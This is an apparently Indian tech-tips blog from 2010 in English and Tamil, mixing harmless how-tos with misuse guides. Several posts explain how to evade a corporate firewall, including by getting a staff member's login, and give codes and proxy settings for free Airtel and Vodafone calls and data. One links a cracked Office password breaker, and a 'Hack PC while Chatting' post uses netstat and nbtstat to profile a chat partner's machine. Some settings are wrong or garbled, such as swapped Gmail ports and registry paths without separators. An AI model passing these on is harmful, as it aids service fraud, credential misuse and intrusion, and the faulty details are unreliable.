Blogger Templates

பல இணைய தளங்களிலிருந்து சேகரித்தவைகளை பலருக்கும் பயனாக அமையும் என்ற நோக்கம் கருதி இந்த - Blogல் பதிந்துள்ளேன்

- பொன்.சுதாகர்

Saturday, December 18, 2010

How to bye pass Cyberoam

Cyberoam is a hardware based corporate FIREWALL. Its probably the most effective firewall in the corporate sector, but that does not mean it can’t be bypassed (fooled).
It DOES not block individual filetypes, what it does is to block fileservers that are known to peddle software not proper for the target individuals. Which means even Torrents are mostly blocked. Not good. The list of blocked servers are constantly updated by the company so you need to be on the constant lookout for newer ways to fool the firewall.
There are a few ways to fool the firewall.
1. Go for the data transfer method known as tunneling. By tunneling the download data through an allowed fileserver you could fool the system in thinking that you are downloading some good data (say Anti-Virus updates). In order to do this you will need to know some network programming (Which I am yet to learn).
2. Another way would be to use a PROXY software. The best free PROXY softwares that work in the Cyberoam network are
a. Vidalia (Tor) : This used to work wonderfully but I’m not sure wheather this still works. I think its worth a try. You can find it at http://www.torproject.org/
b. Ultrasurf : This one is an awesome Proxy. It can easily bypass the Cyberoam firewall but the connection needs to be good otherwise it keeps disconnecting. Always look for an updated edition at the site http://www.ultrareach.com/
3. Another cool way to fool the system is to use a VPN software like HAMACHI. Find someone who would be willing to share a network connection with you, then connect through Hamachi and use the Net uninterrupted. You could even setup a server at you own home and connect to your own computer. The colleges and institutes require VPN services so they NEVER block VPN ports.
4. There is one more way. You could befriend a staff/teacher/anyone with a less blocked account in the network, get their login info, and use it.
For me though, the Ultrasurf way works the best. Try it.
Share:

Saturday, December 11, 2010

VODAFONE FREE LIFETIME VALIDITY

VODAFONE FREE LIFETIME VALIDITY +2000 TT THEN SEND LIFETIME VF TO 111AND ENJOY FREE VALIDITY for postpaid users only

Profile name-vlive
IP=196.006.128.12
Port=8080
Proxy=enable
Homepage=http://www.google.com
Share:

Free ISD Calls througn Air Tel

For free ISD calls, call 121, press 2,4 and 9 then disconnect. After that call 123, then press 2 to IVR. You will ask for recharge code. Enter 54245754213464240 you will hear wrong code. After then your free call will be activated within 72 hours!


sms MINT 940115034473506 to 121. Receive a conformation code by registration, which is free, And get Rs.160

10p calling for airtel to airtel, sms FNF* to whom you want to make call at 10p.note : only 1 no. (airtel), and charges are 15Rs/30days.

Just dial 1802103 (toll free). You'll be asked for 10 digit account number. just enter following no.>1231231231#> 1234567890#now dial the number you want to call, add 0 before the number.
Share:

Monday, November 29, 2010

Folder Lock without any Software...

Many people have been looking for a way to lock folders without the use of any alternative software. So, here you go.


Here is the easy method to lack the folders without using a software. Open Notepad and copy the below code and save as locker.bat. Please don't forget to change your password in the code it's shown the place where to type your password.

Now double click on locker .bat

First time start, it will create folder with Locker automatically for u. After creation of the Locker folder, place the contents u want to lock inside the Locker Folder and run locker.bat again. The Locker folder disappears from the window. To make the folder available again, double click the locker.bat and enter the password. And you get your folder back!
 
cls

@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
09D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked

goto End
:UNLOCK
echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%== type your password here goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End
:FAIL
echo Invalid password

goto end
:MDLOCKER
md Locker
echo Locker created successfully

goto End

:End
Share:

Open Blocked Websites....

 
Steps are described as follows :-

1. Go to Google
2.Type transparent free proxy address free.
3.Click on the transparent proxy fresh transparent proxy list
4.Look for a proxy address with port 8080
5.Now go to tools menu of internet explorer
6.Go to internet options
7.connections tab
8.click Activate use a proxy server for ur LAN options
9.Put that number that you found in the website with 8080 port and hit Ok
10.Again Ok Now open any websites. ...........

                                       Enjoy Moments of Life Make it Large
Share:

How to Configure Gmail in Microsoft Outlook?

         Configuring your Gmail account in Microsoft Outlook would become as easy as 1, 2, 3 for you after reading the below mentioned step by step process. Gmail messages can now be retrieved with the help of any device or client which can provide POP support and Microsoft Outlook is one of those clients that offer POP support to their users. Just concentrate and read the every step carefully to understand the whole process:

POP Option Enabling in Gmail:



■First of all login to your Gmail account

■Then click on “Settings” option which can be seen on right top of your screen

■There you will find “Forwarding and POP / IMAP” option, click on it

■There an option i.e. “Enable POP for All Mails” or “Enable POP for Mail” should be clicked

■Now an action would be asked to choose after getting POP access from Gmail. Choose appropriate one that suits your need

■Check “Configure your POP client” and then a button saying “Save Changes” should be pressed.
 
Configuration in Microsoft Outlook 2007


■We consider that you have already opened Microsoft Outlook 2007, click Tools Menu

■Click an option “E-mail Account”

■There you will see an option “Add a new e-mail account” select it and then click on the button “New”

■There you will be asked by the system to select server type. POP3 or POP option must be selected ….. then click on the option “Next”

■Now system will ask for necessary setting. Put on your desired / required setting including email address and password of your email

■Write “pop.gmail.com” as your incoming mail server and as the settings of outgoing mail server “smtp.gmail.com” must be written in the required field

■Then click on the button that says “More Settings . . .”

■Then click on the tab saying “Outgoing Server” and an option saying “My outgoing server (SMTP) requires authentication” must be checked by you. It will increase security and a password will be required to even send a single email from this Microsoft Outlook in addition to receiving email

■Then on the same screen, you will see a tab saying “Advanced”, click on it

■Here you will have to change port numbers for your incoming and outgoing mail server but first you need to check the appropriate box before assigning any value

■Incoming server should be set a port value as “465” and “995” port number should be set to outgoing mail server

■That’s it. You are done and finally have set up Gmail in Microsoft Outlook 2007.
Share:

Monday, November 22, 2010

USE USB AS A KEY TO START WINDOWS

Most of us are concerned about the security and privacy of our data. We put login passwords, encrypt data and do various other tricks to ensure that someone cannot access our system without our authorization. Hardware manufacturers have also started exploiting our desire for data security by offering fingerprint readers, face recognition and other fancy stuff. If you are paranoid about who accesses your system, you can use a simple trick to prevent the system from booting unless you want it to boot.
This can be achieved by using a regular USB/pen/thumb drive (whatever you call it). Basically configure your system to boot windows from USB stick. The hack would be more than enough to keep even your curious geeky computer friends from booting into the system. That said, it is by no means foolproof (which security measure is? ) so you might not want to bet your life on it.

*** DISCLAIMER : the following method requires you to make some changes to your operating system.MakeUseOf cannot accept any legal liability if anything goes wrong with your PC and you should proceed at your own risk.Please read the instructions thoroughly before beginning and if you are still not sure what you are doing, you should seek help from a knowledgeable friend ***
A key requirement for the hack to work is that your system should support booting from a USB device. This can be verified from within the BIOS menu. So if you have an older system that doesn’t support booting from USB devices, this one is not for you. We will cook up something else! Although, now that I think about it, theoretically (because I have not tried) the hack should work with a floppy disk as well. So you guys with older systems can also follow along and let us know if it worked.
What we are going to do is transfer some of the important files (you will see which ones) that Windows needs in order to boot, to the USB drive. Now if someone was to boot up the PC without your USB drive the system won’t find these important files and will thus fail to boot.
So now that you know the concept, let’s get working:
  • Format the USB drive.
  •  Within Windows Explorer go to Tools > Folder Options. Within the View tab, choose “Show hidden files” and uncheck “Hide protected operating system files”.
    usb key lock computer
  • Open up the Windows Partition (usually C:), copy boot.ini, NTLDR and ntdetect.com onto your USB drive.
  • Boot up the system and change the boot order preference to check for a USB device first. You can access the BIOS menu generally by hitting F8 when the computer just starts.

 Just in case you are curious, the boot.ini file is required to tell where the operating system resides. NTLDR is the NT loader which actually loads the operating system. ntdetect.com detects basic hardware that is required to boot up the system.

The changes are fully recoverable, although it would require some work for the uninitiated. If something goes wrong or you want to restore back things as they were then use the Recovery Console from your Windows CD.
Share:

BLOCK UNWANTED EMAILS

no email
For Gmail:
1. Login to your account
2. At the top-right corner, click on Settings
3. Under Settings,click on Filters
4. You’ll now see an option “Create a new filter“, click on it.
5. Now in the From field enter the email address from which you do not want to receive the emails
For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.
6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

For Yahoo:
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now click on Add 6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.
Fox ex. nishantsri12345@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail:
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. Click on Safe and blocked senders link under Junk e-mail
5. Now click on Blocked senders
6. Type in the email address that you want to block under blocked e-mail address or domain field.
For ex. Enter nishantsri12345@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain. That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy.
Share:

MS - Office Password Breaker full version download

ms office password  breaker

Description:


Forgetting a password to your own Word document or Excel worksheet is surely annoying, but interfering with the office workflow causes substantial damage. If youÆre not in hurry, you can try guessing the password. If you have no time to play games, just unlock your documents and spreadsheets û guaranteed! No matter how long and complex your passwords are, Advanced Office Password breaker recovers Word documents and Excel spreadsheets within a limited timeframe. No need to perform lengthy attacks while a
40-bit encryption key can be crunched quickly and efficiently, and more importantly, with a guaranteed positive result.

Advanced Office Password Breaker unlocks documents created with Microsoft Office Word and Excel 97 and 2000, as well as documents saved with Microsoft Office XP and 2003 in Office 97/2000 Compatibility Mode.

Download Link
Advanced Office Password Breaker Pro 2.0.rar
Share:

How To Protect USB Drive From Virus When Attached To Infected Computer






Have you ever attached a USB to a computer and later found out that the drive is infected by a virus? I have definitely faced this situation many times. If you attach your USB drive to the infected computer the virus is transferred to the drive in no time infecting all the important documents in USB drive too, depending on the nature of the virus you may loose important data from the USB drive and never recover them back. But there is a solution to protect your USB drive from virus infection when it is connected to already infected computer.If you make your USB drive into non writable mode then any kind of data can’t be written to it which means that if a virus infected computer is going to transmit any virus to drive, it won’t be able to because USB drive is write protected.
WRITE PROTECT SWITCH





THUMBSCREW

Thumbscrew is a freeware application that lets you write protect your USB drive so that virus, Malware, Trojan or any kind of infection from host computer.
usb
Would not be able to write anything on your USB. Now right click the system try icon andchoose Make USB read only. This would make the USB drive write protected which makes it completely protected from infections to to spread onto your drive.

USB WRITE PROTECTOR


USB Write Protector is another free utility that allows you make write protect your USB flash / pen drives just like Thumbscrew mentioned above. This is a very small utility that you can always carry with you in your portable drive.By these applications your pen drive would be protected on that shared system but it is still recommended for you to use a quality antivirus software, and keep it updated regularly.

usb write protector
Share:

Restart Windows without Restarting your PC!


When youclickon the shutdownbutton, make sure to simultaneously press SHIFT Button. If you hold the SHIFT key down whileclickingonSHUTDOWNbutton, you computer would restart without restarting the computer.    

This is equivalent to term "HOT REBOOT".

Share:

Hack PC while Chatting

I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
         a) Either it uploads the file and then the other client has to down load it.
         b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
         a) It either goes thru the server
                           Or
         b) It has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.

So lets analyse

1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State

TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED

TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED

TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED

TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???

Hmmm........ Ok so make a DOS attack now

Go to dos prompt and

Just do

nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.

C:\>nbtstat -A 194.30.209.14
Local Area Connection:

Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------

EDP12 <00> UNIQUE Registered

XYZ <00> GROUP Registered

XYZ <20> UNIQUE Registered

XYZCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??

It is now ur job to tell me what u have done next...

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
Share:

Change the Default Locations for Installation

To change the default drive or path where Windows will look for it's installation files, go to the key:


HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionSetupSourcePath

Now you can edit as you wish.

Important Note: Before you read on, you need to keep one thing in mind. Whenever you make changes to the Windows Registry you need to Refresh it before the changes take place. Simply press F5 to refresh the registry and enable the changes. If this does not work Restart your system.
Share:

Clipboard Hack Problem - Shocking news about CTRL+C

Ctrl+C may be the most important work we do everyday. But it's not a very safe thing to do. Read on to know why. What happens when you press Ctrl+C while you are online. We do copy various data by Ctrl + C for pasting elsewhere. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP. This is called clipboard hack problem.


Just try this:
1. Copy any text by Ctrl + C
2. Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
3. You will see the text you copied was accessed by this web page.

Surprised! Do not keep sensitive data (like passwords, credit card numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. Forward this information to as many friends as you can, to save them from online frauds!


It is true, text you last copied for pasting (copy & paste) can be stolen when you visit web sites using a combination of JavaScript and ASP (or PHP, or CGI) to write your possible sensitive data to a database on another server.

How Cipboard Hack is done?

The Clipboard hack is done by the following Source Code:


How to safeguard yourself from Clipboard Hack Problem?

To avoid clipboard hack problem, do the following:

1. Go to Tools->internet options->security.
2. Press custom level.
3. In the security settings, select disable under Allow paste operations via script. (Scripting sub heading)

Now the contents of your clipboard are safe.

Interestingly, this hack works only on internet explorer, and not on Mozilla Firefox browser. Please forward this article to as many friends as you can to make them aware of this issue with CTRL+C.
Share:

Thursday, November 11, 2010

Again Airtel GPRS Hack! Browse Internet For Free

I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! IF you want to browse internet for free of cost using Airtel Live. All you need to have a free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS setting in Airtel Live

IF your Airtel Live is not active, call the customer care and receive Airtel Live setting and configure according to their guidance.

Now download the following Opera mobile browser and install it in to your mobile.

Now you have have activated your Airtel Live and opera mini browner.

Now change the follow the instruction to configure your Airtel Live setting to surf freely

For s60 users:                                                                                
Access Point as airtelgprs.com
Proxy address= 80.239.242.253
Port= 80 (Remember its 80 not 8080)

Just try it on your mobile and share your feeback with us.
Share:

Reset Your Mobile Memory Card Password 2 minutes


We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.

In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)

Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626

Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
Share:

Wednesday, November 10, 2010

Secure your Desktop Icons and Settings

You can save your desktop settings and secure it from your nerdy friend by playing with the registry.


Simply launch the Registry Editor go to:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1.

Refresh and restart for the settings to get saved.
Share:

Want to delete the Find option

To delete the Find option,


go to the following registry key:

HKEY_CLASSES_ROOTDirectoryShellFind

Delete Find.

DO NOT delete Open else you will not be able to open any folders in the Start Menu like Programs, Accessories etc.
Share:

Set Back Ground for Driver


Want your change your driver Bachgroung with cool wall paper.

 
Here is the Code
step 1: open a new notepad
step2: copy the below code in it.

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMonikerPreview=%SystemRoot%\Web\classic.bmp
PersistMoniker=file://Folder Settings\Folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[.ShellClassInfo]
ConfirmFileOp=0
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=130
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=D:\My Documents\00000\f.JPG

Step3: Save the Text file as Desktop.ini file
Step4: Change the ImageArea_Image= your image address as shown in step2
Step5: After done all the things. copy the file to your driver said C:\ paste there.
Step6: Go back the my computer then refresh it
Step7: Now Go to C:\ Cool now you will see the BG...
Step8: hide the file
Share:

Colorful Background For Outlook Express


Now let's move on to some Outlook Express Tricks.

Colorful Background

Don't like the boring background colors of Outlook Express?

Step 1: launch the Windows Registry Editor

step2: scroll down you will see

HKEY_CURRENT_USERSoftwareMicrosoftInternet Mail And News key.

Step3: On the left pane, click on ColorCycle or select Edit and Modify in the menu.

Step4:Now change the value to 1.

Step5:Close and restart your System

Step6:Now, launch Outlook Express.... Get it!!!!!!! Right...!!! Now do next stepStep

step7: whenever you open up a New Message, hold down ctrl-shift and tap the z key to scroll to change the background color.

Step8:Repeat the keystroke to cycle through the colors.

Done :-)
Share:

Monday, November 8, 2010

Rising Antivirus Free Edition

                               risingantivirus
Rising Antivirus Free Edition protects your computers against all types of viruses, Trojans, worms, rootkits and other malicious programs. Ease of use and Smartupdate technology make it an “install and forget” product and entitles you to focus on your own jobs with your computer. RISING Antivirus powerful engine has been certified by Virus Bulletin,Checkmark, TUV.


Rising Antivirus Free Edition is a solution with no cost to personal users for home and non commercial use.

Features:

  •  Anti virus, worms, trojans
  • Anti Rootkit
  • Mail Protection(POP3/SMTP)
  •  Application Protection(RISING unique Account Safe function protects your online bank, online game, MSN, E-mail account, Yahoo Messenger and other private information.)
  • Proactive Defence(protects your security safe from malicious program)
  • Application Access Control
  • Program Startup Control
  • Malicious Behavior Detection
  • Hidden Process Detection
  • Multiple Languages
  • High Speed Update Service
  • Support Service
 
Share:

File and Folder Locker

                                         FileFolderLocker
File & Folder Locker is a very simple utility to lock all of your files, folders and drives. It also helps you to hide one of your drives. Using this tool, you can lock all of your files, folders, hard drives and even removable drives.


Using File & Folder Locker, you can convert your FAT32 drives to NTFS file system without formatting the drives or any data loss.

Requirements :


  •  Only Microsoft Windows XP (any service pack).
  • User account having all administrative privileges (i.e. Administrators account).
  • Drives (i.e. hard/removable) should be in NTFS format.
 
Share:

நீங்களே ரிங்ரோன் (Ringtone) உருவாக்க ஒரு தளம்

Share:

தமிழ் விக்சனரி..

தமிழ் விளக்கங்களுடன் வளரும் பன்மொழி அகரமுதலி - தற்பொழுதுள்ள சொற்கள் = 190,879
 
தமிழ் விக்சனரிக்கு வருக! இது சொற்களின் பொருள், மூலம், பலுக்கல் அடங்கிய, கட்டற்ற பன்மொழி அகரமுதலியொன்றை உருவாக்கும் கூட்டு முயற்சி. இங்கு எல்லா மொழிச் சொற்களுக்குமான பொருள்களும் விளக்கங்களும் தமிழில் கொடுக்கப்பட வேண்டும்.


 
இம் முயற்சியில், நீங்களும் பங்கு பெறலாம்.

 

 அறிமுகப் பக்கம்
  • தொகுத்தலுக்கான பயிற்சியிடம்
  • புதிய சொற்களை நீங்களே சேர்க்க..
  • புதிய சொற்களை சேர்க்கச் சொல்லிக் கேட்க..
Share:

நீங்களும் பேஸ்புக்கில் வலம் வருகின்றீர்களா? அப்படியாயின் இந்த 10 விடயங்களும் உங்களுக்காக...



பேஸ்புக் எவ்வளவு சுவாரஸ்யமானதோ அந்தளவு ஆபத்தானதும் கூட. தகவல் தொழில்நுட்பப் பாதுகாப்பு நிபுணர் டேவிட்வைட்லெக் பேஸ்புக் இனது இன்னொரு பக்கத்தை இவ்வாறு விளக்குகின்றார். இதில் சில படங்களையோ அல்லது தகவல்களையோ போடுவது நீங்கள் வேலையிலிருந்து நீக்கப்படும் ஆபத்தை, அல்லது ஒரு குற்றத்தில் சிக்கும் ஆபத்தை அல்லது அதை விட மோசமான ஆபத்ததை ஏற்படுத்தக் கூடியது. 'data mining'எனப்படும் கணினி மூலம் மேற்கொள்ளப்படும் திருட்டுக்கள் உள்ளன. அதன்மூலம் பேஸ்புக்கில் இல் ஊடுருவி பிறந்த திகதி, தொலைபேசி இலக்கம், விலாசம் என்பனவற்றைப் பெற்றுக் கொள்ளலாம் .

இது குற்றவாளிகளுக்குக் கிடைத்துள்ள தங்கத் துகிள் போன்றது. பேஸ்புக்கில் எப்போதுமே போடக்கூடாத பத்து விடயங்கள் பற்றி டேவிட்வைட்லெக் குறிப்பிட்டுள்ளார்.


பிறந்த திகதியும் இடமும் :-


இது உங்கள் அடையாளங்கள் திருடப்படக்கூடிய மிக ஆபத்தான நிலைக்குத் தள்ளிவிடும். உங்களது கடவுச் சொல்லை மீளமைக்கும் இணையத்தளங்களில் இது பொதுவாகக் கேட்கப்படும் பாதுகாப்புக் கேள்வி. ஒரு குற்றவாளி இதை மீளமைத்தால் அவர் உங்கள் வங்கிக் கணக்கில் பிரவேசிப்பது உட்பட எதைவேண்டுமானாலும் செய்யலாம்.


தாயின் கன்னிப் பெயர் :-

பல இணையத்தளங்கள் உங்களது தாயின் கன்னிப் பெயரை உங்களுக்கு அங்கீகாரம் வழங்கப் பயன்படுத்துகின்றன. நீங்கள் கற்ற பாடசாலையின் பெயரையும் அவை பொதுவாக பாதுகாப்புக் கேள்வியாகப் கேட்டு பயன்படுத்துகின்றன. எனவே இதையும் பேஸ்புக்கில் போடாதீர்கள்.


விலாசம் :-


நீங்கள் எங்கே வசிக்கின்றீர்கள் என்பதை எல்லோரும் தெரிந்துகொள்ள வேண்டும் என்று நீங்கள் உண்மையிலேயே விரும்புகின்றீர்களா? இது அடையாள மோசடியில் மீண்டும் உங்களைத் தள்ளிவிடும். மோசடியாளர்களும் மற்றவர்களைப் பின் தொடர்பவர்களும் இவற்றைப் பாவிக்க இடமுண்டு.


விடுமுறைகள் :-

உங்களது விடுமுறைத் திட்ங்களை நீங்கள் பேஸ்புக்கில் வெளியிடுவது, உங்கள் வீட்டைக் கொள்ளையிட வருமாறு நீங்களே கொள்ளையர்களுக்கு அழைப்பு விடுப்பது போன்றது.

வீட்டிலிருந்து புறப்படும் குறுகிய பயணங்கள் :-

இதுவும் நீங்கள் பின் தொடரப்படவும் கொள்ளையிடப்படவும் கூடிய ஆபத்துக்களை ஏற்படுத்தும். குறிப்பாக நீங்கள் பொருள் கொள்வனவுக்காகச் செல்லும் இடங்கள், நண்பர்களோடு உணவருந்தச் செல்லும் இடங்கள். அதைப்பற்றிய தினம் நேரம் போன்ற விவரங்கள். இது உங்களைப் பின்தொடருபவருக்கு நீங்களே அழைப்பு விடுப்பது போன்றதாகும். பேஸ்புக்கின் மூலம் ஒரு பெண்ணைப் பின் தொடர்ந்து அச்சுறுத்தியது சம்பந்தமாக ஒரு வழக்கும் அண்மையில் பதிவாகியுள்ளது.

முறையற்ற படங்கள் :-

பேஸ்புக்கை பலரும் பார்ப்பதால் இத்தகையப் படங்களைப் போடுவது மோசமானது. அது உங்களைப்பறறிய தவறான ஒரு எண்ணத்தை ஏறபடுத்திவிடும். அதே போல் உங்கள் வீட்டின் மாதிரித் தோற்றத்தைக் காட்டக்கூடிய மற்றும் உங்களிடமிருக்கும் பெறுமதியான பொருள்களைக் காட்டக்கூடிய படங்களையும் போட வேண்டாம்.

ஒப்புதல்கள் :-

இதுவும் உங்களை வேலையிழக்கச் செய்து உங்கள் எதிர்காலத்தையே பாதித்துவிடக்கூடும்.நீங்கள் மற்றவர்களுடன் வைத்திருக்கின்ற உறவு மற்றும் வெட்கக்கேடான செயல்களை பேஸ்புக்கில் மூலம் ஒத்துக் கொள்வது ஆபத்தானது. விளம்பரங்கள்:- நீங்கள் பேஸ்புக்கில் போடுகின்ற எல்லாமே உங்களால் அழிக்கப்பட்ட பின்னரும் கூட அதில் இருக்கும்.

தொலைபேசி இலக்கம் :-

உங்களோடு அவசியம் தொடர்புகொள்ள வேண்டிய நிலைமைகள் தவிர இதைச் செய்ய வேண்டாம். இது 'data mining' திட்டத்தால் பெறப்பட்டு விளம்பரதாரர்களுக்கு வழங்கப்படலாம். மேலும் "Lost my phone" அல்லது "Need Ur number".போன்ற பேஸ்புக் பக்கங்களையும் பாவிக்க வேண்டாம்.


பிள்ளைகளின் பெயர்கள் :-

இதுவும் அடையாளத்திருடர்களால் அல்லது சிறுவர் துஷ்பிரயோகத்தில் ஈடுபடுபவர்களால் பாவிக்கப்படக்கூடும். ஒரு பிள்ளையின் விவரங்களைத் திருடுவது மிகவும் இலேசானது.

பொதுவான முழு அளவிலான விவரங்களை வெளியிட வேண்டாம் :-

பேஸ்புக்கில் இத்தகைய விவரங்கள் இருப்பதானது எந்த ஒரு தேடுதல் இயந்திரத்தினாலும் பாவிக்கப்படக்கூடியது. பெயரை மட்டும் வழங்கிவிட்டு ஏனைய எல்லாவற்றையும் மறைத்து வைத்திருப்பது மேலானது.
Share:

Thursday, September 9, 2010

Customer Care Support Number / E-Mail of Indian Mobile Phones

Videocon Mobiles

  • Website: www.videoconmobiles.com
  • E-Mail: support@videoconmobiles.com
  • Telephone: 0124 4969999
  • Toll Free: 1800 1025 111

Movil Mobile

  • Website: www.movilmobile.com
  • Address: Bling Telecom Private Limited, A1/5, DLF Phase -1, Gurgaon-122002
  • Telephone: 0124-4290014

Sunsky Mobile

  • Website: www.sunskymobile.com
  • E-Mail: hr@sunskymobile.com
  • Corporate Office: C-415, Sector 10, Noida – 201301, Phone: 0120-2530839
  • Registered Office: GS Tower, AT Road, Guwahati – 781001
  • Phone: 0361-(2733049,2602506)
  • Helpline: 09864086672
  • SMS: SUNSKY to 56070

g-Fone Mobile

  • Website: www.g-fone.in
  • E-Mail: care@g-fone.in
  • Address: Bright Telecom India Private Limited,109, DHRUV, 1st Floor, Upper Govind Nagar, Malad (East), Mumbai-400097
  • Phone: (022) 28769381, 28769389, Fax: 022-28769387
  • Toll Free: 18002095625

Magicon Mobiles

  • Website: www.magicon.co.in
  • E-Mail: info@magicon.co.in
  • Address: Magicon Impex Private Limited, A-2/269, Mahipalpur Extension, NH-8, New Delhi-110037
  • Fax: (011) 26782285, 26782286
  • Mobile: 09910787402

Simoco Mobiles

  • Website: www.simoco.net
  • Address: Simoco Telecommunications (South Asia) Limited, Block EP & GP Sector- V, Electronics Complex, Salt Lake, Bidhan Nagar, Kolkata-700091
  • Phone: (033) 23575581-85, 40049900; Fax: 033-23574562

Wynncom Mobile Phones

  • Website: www.wynntelecom.com
  • E-Mail: info@wynntelecom.com
  • Address: Wynn Telecom Limited, Plot no. 301, Udyog Vihar, Phase-II, Gurgaon- 122 016
  • Phone: 0124-4987400
  • Fax: 0124-4987499
  • Toll Free: 1800 102 9299,
  • SMS: WYNNCOM to 56070

Colors Mobile

  • Website: www.colors-mobile.com
  • E-Mail: care@colors-mobile.com
  • Address: Colors Teletech Private Limited, A-264, Okhla Industrial Area – Phase-I, New Delhi-110020
  • Telephone : 011-41408031
  • Fax: 011-41408031
  • Customer Care: 09999388111

Zen Mobile

  • Website: www.zenmobile.in
  • Address: Zen house, Plot No. 1261, Kohinoor Enclave, Western Marg, Saidulajab, Delhi-110030
  • Phone: 011-46555676

MVL Mobiles

  • Website: www.mvl.in
  • E-Mail: customercare@mvl.in
